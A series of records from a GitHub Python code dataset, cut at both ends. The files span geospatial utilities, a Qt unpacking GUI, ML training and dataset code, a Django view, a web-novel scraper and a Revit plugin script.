shapely.geometry.point import Point as P\n\nEARTH_RADIUS = 6373000.0\nPoint = Tuple[float, float]\nPointTuple = Tuple[Point, Point]\n\n\ndef get_segment_length(segment: PointTuple):\n\n lat1 = math.radians(segment[0][1])\n lon1 = math.radians(segment[0][0])\n lat2 = math.radians(segment[1][1])\n lon2 = math.radians(segment[1][0])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = (math.sin(dlat / 2)) ** 2 + math.cos(lat1) * math.cos(lat2) * (math.sin(dlon / 2)) ** 2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n return EARTH_RADIUS * c\n\n\ndef get_bb_area(bbox: PointTuple) -> float:\n origin = bbox[0]\n x = (bbox[0][0], bbox[1][1])\n y = (bbox[1][0], bbox[0][1])\n x_length = get_segment_length((origin, x))\n y_length = get_segment_length((origin, y))\n area = x_length * y_length / (1000 * 1000)\n return area\n\n\ndef get_bb(boxes: List[PointTuple]) -> PointTuple:\n p1 = [180, 90]\n p2 = [-180, -90]\n for box in boxes:\n if box[0][0] < p1[0]:\n p1[0] = box[0][0]\n if box[0][1] < p1[1]:\n p1[1] = box[0][1]\n if box[1][0] > p2[0]:\n p2[0] = box[1][0]\n if box[1][1] > p2[1]:\n p2[1] = box[1][1]\n return (tuple(p1), tuple(p2))\n\n\ndef subdivide_bb(bb: PointTuple, subdivide_factor: int) -> Generator[PointTuple, None, None]:\n w = (bb[1][0] - bb[0][0]) / subdivide_factor\n h = (bb[1][1] - bb[0][1]) / subdivide_factor\n for i in range(0, subdivide_factor):\n for j in range(0, subdivide_factor):\n p1 = (bb[0][0] + i * w, bb[0][1] + j * h)\n p2 = (bb[0][0] + (i + 1) * w, bb[0][1] + (j + 1) * h)\n yield (p1, p2)\n\n\ndef bb_intersects(bb1: PointTuple, bb2: PointTuple):\n \"\"\" bb2 - city\"\"\"\n sh_bb1 = box(bb1[0][0], bb1[0][1], bb1[1][0], bb1[1][1])\n sh_bb2 = P(bb2[0]) # We are checking the bottom left corner only\n return sh_bb1.touches(sh_bb2) or sh_bb1.contains(sh_bb2)\n\n\ndef get_segment_details(s: PointTuple) -> Tuple[float, float]:\n p = (s[0][0], s[1][1])\n dy = get_segment_length((s[0], p))\n dx = get_segment_length((p, s[1]))\n if s[0][0] > s[1][0]:\n dx = -dx\n if s[0][1] > s[1][1]:\n dy = -dy\n az = math.degrees(math.atan2(dy, dx))\n if az < 0:\n az = az + 180\n az = (-az + 270) % 360\n if az > 180:\n az = az - 180\n return az, get_segment_length(s)","repo_name":"sztanko/solsticestreets","sub_path":"python/solstreets/geo_utils.py","file_name":"geo_utils.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"73027335413","text":"from __future__ import division, print_function, unicode_literals\n\nimport os\n\nfrom PyQt4 import QtCore, QtGui\n\nimport reprounzip_qt.reprounzip_interface as reprounzip\nfrom reprounzip_qt.gui.common import ROOT, ResizableStack, \\\n handle_error, error_msg\n\n\nclass UnpackerOptions(QtGui.QWidget):\n def __init__(self):\n super(UnpackerOptions, self).__init__()\n self.setLayout(QtGui.QGridLayout())\n\n def add_row(self, label, widget):\n layout = self.layout()\n row = layout.rowCount()\n layout.addWidget(QtGui.QLabel(label), row, 0)\n layout.addWidget(widget, row, 1)\n\n def options(self):\n return {'args': []}\n\n\nclass DirectoryOptions(UnpackerOptions):\n def __init__(self):\n super(DirectoryOptions, self).__init__()\n self.layout().addWidget(\n QtGui.QLabel(\"(directory unpacker has no option)\"),\n 0, 0, 1, 2)\n\n\nclass ChrootOptions(UnpackerOptions):\n def __init__(self):\n super(ChrootOptions, self).__init__()\n\n self.root = QtGui.QComboBox(editable=False)\n self.root.addItems(ROOT.TEXT)\n self.add_row(\"Elevate privileges:\", self.root)\n\n self.preserve_owner = QtGui.QCheckBox(\"enabled\", tristate=True)\n self.preserve_owner.setCheckState(QtCore.Qt.PartiallyChecked)\n self.add_row(\"Preserve file ownership:\", self.preserve_owner)\n\n self.magic_dirs = QtGui.QCheckBox(\n \"mount /dev and /proc inside the chroot\", tristate=True)\n self.magic_dirs.setCheckState(QtCore.Qt.PartiallyChecked)\n self.add_row(\"Mount magic dirs:\", self.magic_dirs)\n\n def options(self):\n options = super(ChrootOptions, self).options()\n\n options['root'] = ROOT.INDEX_TO_OPTION[self.root.currentIndex()]\n\n if self.preserve_owner.checkState() == QtCore.Qt.Unchecked:\n options['args'].append('--dont-preserve-owner')\n elif self.preserve_owner.checkState() == QtCore.Qt.Checked:\n options['args'].append('--preserve-owner')\n\n if self.magic_dirs.checkState() == QtCore.Qt.Unchecked:\n options['args'].append('--dont-bind-magic-dirs')\n elif self.magic_dirs.checkState() == QtCore.Qt.Checked:\n options['args'].append('--bind-magic-dirs')\n\n return options\n\n\nclass DockerOptions(UnpackerOptions):\n def __init__(self):\n super(DockerOptions, self).__init__()\n\n self.root = QtGui.QComboBox(editable=False)\n self.root.addItems(ROOT.TEXT)\n self.add_row(\"Elevate privileges:\", self.root)\n\n self.image = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Base image:\", self.image)\n\n self.distribution = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Distribution:\", self.distribution)\n\n self.install_pkgs = QtGui.QCheckBox(\"install packages rather than \"\n \"extracting them from RPZ\")\n self.add_row(\"Install packages:\", self.install_pkgs)\n\n def options(self):\n options = super(DockerOptions, self).options()\n\n options['root'] = ROOT.INDEX_TO_OPTION[self.root.currentIndex()]\n\n if self.image.text():\n options['args'].extend(['--base-image', self.image.text()])\n\n if self.distribution.text():\n options['args'].extend(['--distribution',\n self.distribution.text()])\n\n if self.install_pkgs.isChecked():\n options['args'].append('--install-pkgs')\n\n return options\n\n\nclass VagrantOptions(UnpackerOptions):\n def __init__(self):\n super(VagrantOptions, self).__init__()\n\n self.image = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Base box:\", self.image)\n\n self.distribution = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Distribution:\", self.distribution)\n\n self.memory = QtGui.QSpinBox(suffix=\"MB\", minimum=99, maximum=64000,\n specialValueText=\"(default)\", value=99)\n self.add_row(\"Memory:\", self.memory)\n\n self.gui = QtGui.QCheckBox(\"Enable local GUI\")\n self.add_row(\"GUI:\", self.gui)\n\n self.use_chroot = QtGui.QCheckBox(\"use chroot and prefer packed files \"\n \"over the virtual machines' files\",\n checked=True)\n self.add_row(\"Chroot:\", self.use_chroot)\n\n self.magic_dirs = QtGui.QCheckBox(\"mount /dev and /proc inside the \"\n \"chroot\", checked=True)\n self.add_row(\"Mount magic dirs:\", self.magic_dirs)\n\n def options(self):\n options = super(VagrantOptions, self).options()\n\n if self.image.text():\n options['args'].extend(['--base-image', self.image.text()])\n\n if self.distribution.text():\n options['args'].extend(['--distribution',\n self.distribution.text()])\n\n if self.memory.value() != 99:\n options['args'].extend(['--memory', '%d' % self.memory.value()])\n\n if self.gui.isChecked():\n options['args'].append('--use-gui')\n\n if not self.use_chroot.isChecked():\n options['args'].append('--dont-use-chroot')\n\n if not self.magic_dirs.isChecked():\n options['args'].append('--dont-bind-magic-dirs')\n\n return options\n\n\nclass UnpackTab(QtGui.QWidget):\n \"\"\"The unpack window, that sets up a .RPZ file in a directory.\n \"\"\"\n UNPACKERS = [\n ('directory', DirectoryOptions),\n ('chroot', ChrootOptions),\n ('docker', DockerOptions),\n ('vagrant', VagrantOptions),\n ]\n\n unpacked = QtCore.pyqtSignal(str, object)\n\n def __init__(self, package='', **kwargs):\n super(UnpackTab, self).__init__(**kwargs)\n\n layout = QtGui.QGridLayout()\n layout.addWidget(QtGui.QLabel(\"RPZ package:\"), 0, 0)\n self.package_widget = QtGui.QLineEdit(package, enabled=False)\n layout.addWidget(self.package_widget, 0, 1)\n browse_pkg = QtGui.QPushButton(\"Browse\")\n browse_pkg.clicked.connect(self._browse_pkg)\n layout.addWidget(browse_pkg, 0, 2)\n\n layout.addWidget(QtGui.QLabel(\"Unpacker:\"), 1, 0,\n QtCore.Qt.AlignTop)\n ulayout = QtGui.QVBoxLayout()\n self.unpackers = QtGui.QButtonGroup()\n for i, name in enumerate(n for n, c in self.UNPACKERS):\n radio = QtGui.QRadioButton(name)\n self.unpackers.addButton(radio, i)\n ulayout.addWidget(radio)\n layout.addLayout(ulayout, 1, 1, 1, 2)\n\n group = QtGui.QGroupBox(title=\"Unpacker options\")\n group_layout = QtGui.QVBoxLayout()\n self.unpacker_options = ResizableStack()\n self.unpackers.buttonClicked[int].connect(\n self.unpacker_options.setCurrentIndex)\n scroll = QtGui.QScrollArea(widgetResizable=True)\n scroll.setWidget(self.unpacker_options)\n group_layout.addWidget(scroll)\n group.setLayout(group_layout)\n layout.addWidget(group, 2, 0, 1, 3)\n layout.setRowStretch(2, 1)\n\n for i, (name, WidgetClass) in enumerate(self.UNPACKERS):\n widget = WidgetClass()\n self.unpacker_options.addWidget(widget)\n\n self.unpacker_options.addWidget(QtGui.QLabel(\"Select an unpacker to \"\n \"display options...\"))\n self.unpacker_options.setCurrentIndex(len(self.UNPACKERS))\n\n layout.addWidget(QtGui.QLabel(\"Destination directory:\"), 3, 0)\n self.directory_widget = QtGui.QLineEdit()\n self.directory_widget.editingFinished.connect(self._directory_changed)\n layout.addWidget(self.directory_widget, 3, 1)\n browse_dir = QtGui.QPushButton(\"Browse\")\n browse_dir.clicked.connect(self._browse_dir)\n layout.addWidget(browse_dir, 3, 2)\n\n buttons = QtGui.QHBoxLayout()\n buttons.addStretch(1)\n self.unpack_widget = QtGui.QPushButton(\"Unpack experiment\",\n enabled=False)\n self.unpack_widget.clicked.connect(self._unpack)\n buttons.addWidget(self.unpack_widget)\n layout.addLayout(buttons, 4, 0, 1, 3)\n\n self.setLayout(layout)\n\n self._package_changed()\n\n def _browse_pkg(self):\n picked = QtGui.QFileDialog.getOpenFileName(\n self, \"Pick package file\",\n QtCore.QDir.currentPath(), \"ReproZip Packages (*.rpz)\")\n if picked:\n self.package_widget.setText(picked)\n self._package_changed()\n\n def _package_changed(self, new_pkg=None):\n package = self.package_widget.text()\n if package.lower().endswith('.rpz'):\n self.directory_widget.setText(package[:-4])\n self._directory_changed()\n\n def _browse_dir(self):\n picked = QtGui.QFileDialog.getSaveFileName(\n self, \"Pick directory\",\n QtCore.QDir.currentPath())\n if picked:\n if os.path.exists(picked):\n error_msg(self, \"This directory already exists\", 'warning')\n else:\n self.directory_widget.setText(picked)\n self._directory_changed()\n\n def _directory_changed(self, new_dir=None):\n self.unpack_widget.setEnabled(bool(self.directory_widget.text()))\n\n def _unpack(self):\n directory = self.directory_widget.text()\n if not directory:\n return\n unpacker = self.unpackers.checkedButton()\n if unpacker:\n options = self.unpacker_options.currentWidget().options()\n if options is None:\n return\n if handle_error(self, reprounzip.unpack(\n self.package_widget.text(),\n unpacker.text(),\n directory,\n options)):\n self.unpacked.emit(os.path.abspath(directory),\n options.get('root'))\n else:\n error_msg(self, \"No unpacker selected\", 'warning')\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ViDA-NYU_reprozip/reprozip-master/reprounzip-qt/reprounzip_qt/gui/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"38566737522","text":"import os\nfrom os import path\nimport pandas as pd \nimport clip \nfrom torch.utils.data.dataset import Dataset\n\nclass DescriptionDataset(Dataset):\n \"\"\"\n \"\"\"\n\n def __init__(self, name = 'trecvid', root = None, subset = 'train'):\n self.root = root\n self.subset = subset \n self.short_text_descriptions = path.join(root, f'{subset}_text_descriptions.csv') \n \n desc_csv = pd.read_csv(self.short_text_descriptions) \n \n self.description = []\n self.videos = set()\n for i, row in desc_csv.iterrows():\n vid_id = str(row['video_id']).zfill(5)\n self.videos.add(vid_id)\n try:\n curr_description = row['description'] \n \n if len(curr_description) > 70:\n curr_description = ' '.join(curr_description.split()[:70])\n self.description.append({\n \"description\": clip.tokenize(curr_description)[0] ,\n \"video_id\": int(vid_id)\n })\n except:\n pass \n for i in range(10):\n try:\n curr_description = row[f'description_{i}'] \n if len(curr_description) > 70:\n curr_description = ' '.join(curr_description.split()[:70])\n \n self.description.append({\n \"description\": clip.tokenize(curr_description)[0] ,\n \"video_id\": int(vid_id)\n })\n except:\n pass\n \n print('%d descriptions of %d videos accepted in %s.' % (len(self.description), len(self.videos), self.root))\n \n def __getitem__(self, idx):\n return self.description[idx]\n\n def __len__(self):\n return len(self.description)","repo_name":"nhatkhtn/Image-Retrieval-Backend","sub_path":"mysite/myapp/VideoRetrieval/datasets/description.py","file_name":"description.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37981361241","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import User\nfrom .models import Attention\nfrom .models import Studio\nfrom . import MyUtils\nimport simplejson\nfrom django.views.decorators.csrf import csrf_exempt\n\n@csrf_exempt\ndef attention(request):\n username = request.POST['username']\n try:\n obj = User.objects.filter(username=username).values('isTea')\n # if obj[0]['isTea'] == False:\n attObj = Attention.objects.filter(username=username).values('teachername')#该用户关注的教师\n stuObj = Studio.objects.filter(isstream=True).values('teachername')#正在直播的教师\n teaidList = []\n for i in stuObj:\n teaidList.append(i['teachername'])\n resList = []\n for value1 in attObj:\n if value1['teachername'] in teaidList:\n # resList.append({value1['teachername']:True})\n tempDict = {}\n tempDict['name'] = value1['teachername']\n tempDict['type'] = True\n #查询老师头像\n objImg = User.objects.filter(username=value1['teachername']).values('imgpath')\n if len(objImg) > 0:\n tempDict['imgpath'] = objImg[0]['imgpath']\n else:\n tempDict['imgpath'] = null\n resList.append(tempDict)\n else:\n # resList.append({value1['teachername']:False})\n tempDict = {}\n tempDict['name'] = value1['teachername']\n tempDict['type'] = False\n objImg = User.objects.filter(username=value1['teachername']).values('imgpath')\n if len(objImg) > 0:\n tempDict['imgpath'] = objImg[0]['imgpath']\n else:\n tempDict['imgpath'] = null\n resList.append(tempDict)\n returnDict = {\n 'success':True,\n 'list':resList\n }\n return HttpResponse(simplejson.dumps(returnDict),content_type=\"application/json\")\n except Exception:\n return HttpResponse(simplejson.dumps({'success':False}),content_type=\"application/json\")\n","repo_name":"jishic/webcase","sub_path":"qiusuo/backend/viewAttention.py","file_name":"viewAttention.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69808141172","text":"#!/usr/bin/python3\n\"\"\"lass definition of a State and an instance Base = declarative_base()\"\"\"\nfrom sqlalchemy import ForeignKey, Integer, String, Column\nfrom relationship_state import Base, State\nfrom sqlalchemy.orm import relationship\n\n\nclass City(Base):\n \"\"\"cities class\"\"\"\n __tablename__ = 'cities'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(128), nullable=False)\n state_id = Column(Integer, ForeignKey('states.id'), nullable=False)\n\n def __repr__(self):\n return(\"\"\n % (self.id, self.name, self.state_id))\n","repo_name":"gjdame/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/relationship_city.py","file_name":"relationship_city.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"20401517140","text":"import m8r\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# VP\nvp_rsf = m8r.Input('../vp.rsf')\nvp = np.array(vp_rsf[:]).reshape(vp_rsf.int('n2'), vp_rsf.int('n1')).T\n\n# Ifull\ni_rsf = m8r.Input('isum.rsf')\ni = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Iup\ni_rsf = m8r.Input('iupsum.rsf')\niup = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n\n# Inofs\ni_rsf = m8r.Input('i_nofssum.rsf')\ninofs = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Inosea\ni_rsf = m8r.Input('i_noseasum.rsf')\ninosea = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Imdd\ni_rsf = m8r.Input('imddsum.rsf')\nimdd = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Imdd\ni_rsf = m8r.Input('isgdsum.rsf')\nisgd = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\nplt.figure(figsize=(10,5))\nplt.imshow(i, cmap='gray', interpolation=None)\nplt.show()\n\nnp.savez('images', vp=vp, i=i, iup=iup, inofs=inofs, inosea=inosea, imdd=imdd, isgd=isgd)\n","repo_name":"DIG-Kaust/VolveSynthetic","sub_path":"Imaging/saveimages.py","file_name":"saveimages.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24079519172","text":"\nimport torch\nimport torch.nn as nn\nfrom torch.backends import cudnn\ncudnn.enabled = True\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\nimport importlib\n\nimport voc12.dataloader\nfrom misc import pyutils, imutils\n\nimport numpy as np\nfrom chainercv.datasets import VOCSemanticSegmentationDataset\nfrom chainercv.evaluations import calc_semantic_segmentation_confusion\nfrom tqdm import tqdm\nfrom PIL import Image\n\n\ndef balanced_cross_entropy(logits, labels, one_hot_labels):\n \"\"\"\n :param logits: shape: (N, C)\n :param labels: shape: (N, C)\n :param reduction: options: \"none\", \"mean\", \"sum\"\n :return: loss or losses\n \"\"\"\n\n N, C, H, W = logits.shape\n\n assert one_hot_labels.size(0) == N and one_hot_labels.size(1) == C, f'label tensor shape is {one_hot_labels.shape}, while logits tensor shape is {logits.shape}'\n\n log_logits = F.log_softmax(logits, dim=1)\n loss_structure = -torch.sum(log_logits * one_hot_labels, dim=1) # (N)\n\n ignore_mask_bg = torch.zeros_like(labels)\n ignore_mask_fg = torch.zeros_like(labels)\n \n ignore_mask_bg[labels == 0] = 1\n ignore_mask_fg[(labels != 0) & (labels != 255)] = 1\n \n loss_bg = (loss_structure * ignore_mask_bg).sum() / ignore_mask_bg.sum()\n loss_fg = (loss_structure * ignore_mask_fg).sum() / ignore_mask_fg.sum()\n\n return (loss_bg+loss_fg)/2\n\n\ndef resize_labels(labels, size):\n \"\"\"\n Downsample labels for 0.5x and 0.75x logits by nearest interpolation.\n Other nearest methods result in misaligned labels.\n -> F.interpolate(labels, shape, mode='nearest')\n -> cv2.resize(labels, shape, interpolation=cv2.INTER_NEAREST)\n \"\"\"\n new_labels = []\n for label in labels:\n label = label.float().numpy()\n label = Image.fromarray(label).resize(size, resample=Image.NEAREST)\n new_labels.append(np.asarray(label))\n new_labels = torch.LongTensor(new_labels)\n return new_labels\n\n\ndef run(args):\n\n model = getattr(importlib.import_module(args.amn_network), 'Net')()\n\n train_dataset = voc12.dataloader.VOC12SegmentationDataset(args.train_list,\n label_dir=args.ir_label_out_dir,\n voc12_root=args.voc12_root,\n hor_flip=True,\n crop_size=args.amn_crop_size,\n crop_method=\"random\",\n rescale=(0.5, 1.5)\n )\n\n train_data_loader = DataLoader(train_dataset, batch_size=args.amn_batch_size,\n shuffle=True, num_workers=args.num_workers, pin_memory=True, drop_last=True)\n\n val_dataset = voc12.dataloader.VOC12SegmentationDataset(args.infer_list,\n label_dir=args.ir_label_out_dir,\n voc12_root=args.voc12_root,\n crop_size=None,\n crop_method=\"none\",\n )\n\n val_data_loader = DataLoader(val_dataset, batch_size=1,\n shuffle=False, num_workers=args.num_workers, pin_memory=True, drop_last=False)\n\n param_groups = model.trainable_parameters()\n\n optimizer = torch.optim.Adam(\n params=[\n {\n 'params': param_groups[0],\n 'lr': 5e-06,\n 'weight_decay': 1.0e-4,\n },\n {\n 'params': param_groups[1],\n 'lr': 1e-04,\n 'weight_decay': 1.0e-4,\n },\n ],\n )\n\n total_epochs = args.amn_num_epoches\n\n model = torch.nn.DataParallel(model).cuda()\n\n model.train()\n\n avg_meter = pyutils.AverageMeter()\n \n for ep in range(total_epochs):\n loader_iter = iter(train_data_loader)\n\n pbar = tqdm(\n range(1, len(train_data_loader) + 1),\n total=len(train_data_loader),\n dynamic_ncols=True,\n )\n\n for iteration, _ in enumerate(pbar):\n optimizer.zero_grad()\n try:\n pack = next(loader_iter)\n except:\n loader_iter = iter(train_data_loader)\n pack = next(loader_iter)\n\n img = pack['img'].cuda(non_blocking=True)\n label_amn = pack['label'].long().cuda(non_blocking=True)\n label_cls = pack['label_cls'].cuda(non_blocking=True)\n\n logit = model(img, label_cls)\n\n B, C, H, W = logit.shape\n\n label_amn = resize_labels(label_amn.cpu(), size=logit.shape[-2:]).cuda()\n\n label_ = label_amn.clone()\n label_[label_amn == 255] = 0\n\n given_labels = torch.full(size=(B, C, H, W), fill_value=args.eps/(C-1)).cuda()\n given_labels.scatter_(dim=1, index=torch.unsqueeze(label_, dim=1), value=1-args.eps)\n\n loss_pcl = balanced_cross_entropy(logit, label_amn, given_labels)\n\n loss = loss_pcl\n loss.backward()\n\n optimizer.step()\n\n avg_meter.add({'loss_pcl': loss_pcl.item()})\n\n pbar.set_description(f\"[{ep + 1}/{total_epochs}] \"\n f\"PCL: [{avg_meter.pop('loss_pcl'):.4f}]\")\n \n with torch.no_grad():\n model.eval()\n dataset = VOCSemanticSegmentationDataset(split=args.chainer_eval_set, data_dir=args.voc12_root)\n labels = []\n preds = []\n\n for i, pack in enumerate(tqdm(val_data_loader)):\n\n img_name = pack['name'][0]\n img = pack['img']\n label_cls = pack['label_cls'][0]\n\n img = img.cuda()\n\n logit = model(img, pack['label_cls'].cuda())\n\n size = img.shape[-2:]\n strided_up_size = imutils.get_strided_up_size(size, 16)\n\n valid_cat = torch.nonzero(label_cls)[:, 0]\n keys = np.pad(valid_cat + 1, (1, 0), mode='constant')\n\n logit_up = F.interpolate(logit, strided_up_size, mode='bilinear', align_corners=False)\n logit_up = logit_up[0, :, :size[0], :size[1]]\n\n logit_up = F.softmax(logit_up, dim=0)[keys].cpu().numpy()\n\n cls_labels = np.argmax(logit_up, axis=0)\n cls_labels = keys[cls_labels]\n\n preds.append(cls_labels.copy())\n\n gt_label = dataset.get_example_by_keys(i, (1,))[0]\n\n labels.append(gt_label.copy())\n\n confusion = calc_semantic_segmentation_confusion(preds, labels)\n\n gtj = confusion.sum(axis=1)\n resj = confusion.sum(axis=0)\n gtjresj = np.diag(confusion)\n denominator = gtj + resj - gtjresj\n iou = gtjresj / denominator\n\n print(f'[{ep + 1}/{total_epochs}] miou: {np.nanmean(iou):.4f}')\n\n model.train()\n\n torch.save(model.module.state_dict(), args.amn_weights_name + '.pth')\n torch.cuda.empty_cache()","repo_name":"gaviotas/AMN","sub_path":"step/train_amn.py","file_name":"train_amn.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"21"} +{"seq_id":"4734039852","text":"n = int(input())\ndp = [0] * (n + 1) #dp = [0 for _ in range(n + 1)]로 리스트컴프리헨션으로 만들 수 있음을 계속 상기할 것!\n\nif n <= 3:\n print(n)\nelse:\n dp[1] = 1\n dp[2] = 2\n for i in range(3, n + 1):\n dp[i] = dp[i - 1] + dp[i - 2]\n print(dp[i] % 10007)","repo_name":"whdjh/python","sub_path":"Baekjoon/2.기초/11726_2xn타일링.py","file_name":"11726_2xn타일링.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71651912374","text":"import json\nimport posixpath\nimport os\nfrom mkdocs.structure.files import Files\nfrom mkdocs.config.defaults import MkDocsConfig\n\ndef list_existing_pages(config: MkDocsConfig, files: Files):\n pages = []\n output_dir = config['site_dir']\n for file in files:\n if file.is_documentation_page() or file.is_media_file():\n pages.append({\n 'src_uri' : file.src_path,\n 'dest_uri' : file.url,\n 'name': file.name,\n 'url' : file.url,\n })\n with open(posixpath.join(output_dir, 'search', 'all_files.json'), 'w', encoding=\"UTF-8\") as f:\n json.dump(pages, f, indent=4)\n\ndef on_files(files: Files, config: MkDocsConfig):\n if not (posixpath.exists(posixpath.join(config['site_dir'], 'search'))):\n os.makedirs(posixpath.join(config['site_dir'], 'search'))\n list_existing_pages(config, files)\n return files\n\n","repo_name":"ObsidianPublisher/template-gh-pages","sub_path":"overrides/hooks/on_files.py","file_name":"on_files.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"21"} +{"seq_id":"32086202121","text":"from novels.core.epub_core import *\n\ncss_data = '''h1,h2{text-align: center}\np{text-indent: 2em}'''\n\nclass Qin():\n\n def __init__(self, url, max_retries=3):\n\n # self.variables\n self.url = url\n self.book_page_check()\n self.driver = set_driver()\n for retries in range(max_retries):\n self.driver.get(url)\n wait_loading(self.driver)\n self.soup = BeautifulSoup(self.driver.page_source, \"html.parser\")\n break\n\n def book_page_check(self):\n if re.search('/book/', self.url):\n self.book_check = True\n else:\n self.book_check = False\n\n# Book\n\n def get_book_info(self):\n self.book_title = self.soup.find(class_='book_name flex_shrink').text\n try:\n self.cover_src = urljoin(self.url, self.soup.find(class_='book_info').find('img').get('src'))\n except:\n self.cover_src = ''\n\n def get_url_list(self):\n list = []\n a_list = self.soup.find_all(class_='site_box')[1].find_all('a')\n for a in a_list:\n link = urljoin(self.url, a.get('href'))\n if re.search('/read/', link) and link not in [item[0] for item in list]:\n list.append(link)\n self.url_list = [(link, '', '') for link in list]\n return self.url_list\n\n# Page\n\n # Get Page Content\n def get_page_content(self, url, wrong_max=50, next_page_check = True):\n print(url)\n wrong_times = 0\n while True:\n try:\n self.driver.get(url)\n wait_loading(self.driver)\n resources = self.driver.page_source\n soup = BeautifulSoup(resources, \"html.parser\")\n result = soup.find(id='chapter_content')\n title = soup.find(class_='title').find('h3').text\n print(title)\n content = str(result)\n print(content[0:300])\n images = result.find_all('img')\n image_srcs = []\n for image in images:\n image_src = image.get('src')\n if image_src not in image_srcs:\n image_srcs.append(image_src)\n\n # Try next page\n while next_page_check:\n print('Next Page.')\n resources = self.driver.page_source\n soup = BeautifulSoup(resources, \"html.parser\")\n result = soup.find(id='chapter_content')\n print(str(result)[:300])\n content = content +'\\n'+ str(result)\n images = result.find_all('img')\n for image in images:\n image_src = image.get('src')\n if image_src not in image_srcs:\n image_srcs.append(image_src)\n next_page_check = next_page(self.driver, '//a[text()=\"下一页\"]')\n return (title, content, image_srcs)\n\n except Exception as e:\n print(e)\n wrong_times += 1\n time.sleep(1)\n if wrong_times >= wrong_max:\n break\n else:\n print('Try again.')\n pass\n\n\n def get_page_title(self):\n self.page_title = self.soup.find('h1').text\n\n # Quit Driver\n def quit(self):\n self.driver.quit()\n\n # Check next page\n def nextPage(self, link_text):\n try:\n next_page = self.driver.find_element_by_link_text(link_text)\n next_page.click()\n wait_loading(self.driver)\n return True\n except:\n return False\n","repo_name":"mk2016a/LightNovels","sub_path":"novels/core/epub_qin.py","file_name":"epub_qin.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34230433229","text":"from brownie import accounts, SimpleStorage\r\nfrom scripts.deploy import deploy_simple_storage\r\n\r\ndef test_can_set_number():\r\n # Arrange\r\n account = accounts[0]\r\n simple_storage = SimpleStorage.deploy({\"from\": account})\r\n expected = 777\r\n\r\n # Act \r\n tx = simple_storage.setNumber(expected, {\"from\": account})\r\n tx.wait(1)\r\n\r\n # Assert \r\n assert simple_storage.number() == expected\r\n\r\ndef test_dummy():\r\n assert True","repo_name":"pinalikefruit/Hackathon-Chainlink-Spring-2022","sub_path":"Brownie/tests/unit/test_simple_storage.py","file_name":"test_simple_storage.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"60097602","text":"import os\n\n\nos.chdir('Downloads/Prueba')\nfiles = os.listdir()\n#print(files)\n#print(os.getcwd())\nnew_names = []\nfor file in files:\n new_file = ''\n file = file.split('-')\n new_file = file[0]\n for idx, splited in enumerate(file):\n if idx == len(file)-1:\n break\n if idx != 0:\n new_file = new_file + '-' + splited\n \n \n \n print(new_file)\n new_names.append(new_file+'.mp3')\n\nfor idx, file in enumerate(new_names):\n print(new_names)\n os.rename(files[idx], new_names[idx])","repo_name":"MauricioD13/Python-programs","sub_path":"Music/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"982552575","text":"# coding: utf8\n\nfrom Autodesk.Revit import Exceptions\nfrom Autodesk.Revit.DB import InsulationLiningBase, Document, FamilyInstance\nfrom Autodesk.Revit.UI.Selection import ISelectionFilter, ObjectType\n\nfrom pyrevit import script, forms, revit\nfrom pyrevitmep.meputils import get_connector_closest_to, get_connector_manager\n\n__doc__ = \"\"\"Create a MEP transition between 2 open ends.\nSelect first object (pick a location close to the desired connector)\nSelect second object (pick a location close to the desired connector)\"\"\"\n__title__ = \"Transition\"\n__author__ = \"Cyril Waechter\"\n\nlogger = script.get_logger()\nuidoc = __revit__.ActiveUIDocument\ndoc = __revit__.ActiveUIDocument.Document # type: Document\n\n\nclass NoInsulation(ISelectionFilter):\n def AllowElement(self, elem):\n if isinstance(elem, InsulationLiningBase):\n return False\n try:\n get_connector_manager(elem)\n return True\n 